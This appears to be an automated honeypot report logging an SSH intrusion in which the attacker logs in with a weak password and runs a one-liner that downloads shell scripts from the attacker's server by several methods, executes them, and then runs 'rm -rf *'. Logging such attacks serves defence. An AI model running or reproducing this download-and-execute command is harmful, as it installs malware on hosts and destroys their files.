Attack Report for Observation

Header

Time: 2023/09/10, 22:34:21 (GMT)
Transaction ID: FFEAC7IDKNAD7GNO
Service: ssh
Location: NL (Netherlands)
Attacker: 79.110.48.105
Classification: Web script execution
Harm Potential: High
Description: Execution of a script downloaded from the web (www)

Content

79.110.48.105 client username 'DUP usuario' and password 'usuario' entered
79.110.48.105 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://79.110.48.105/ohshit.sh; curl -O http://79.110.48.105/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 79.110.48.105 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 79.110.48.105; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 79.110.48.105 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *'

All observations come from the honeypot central database.
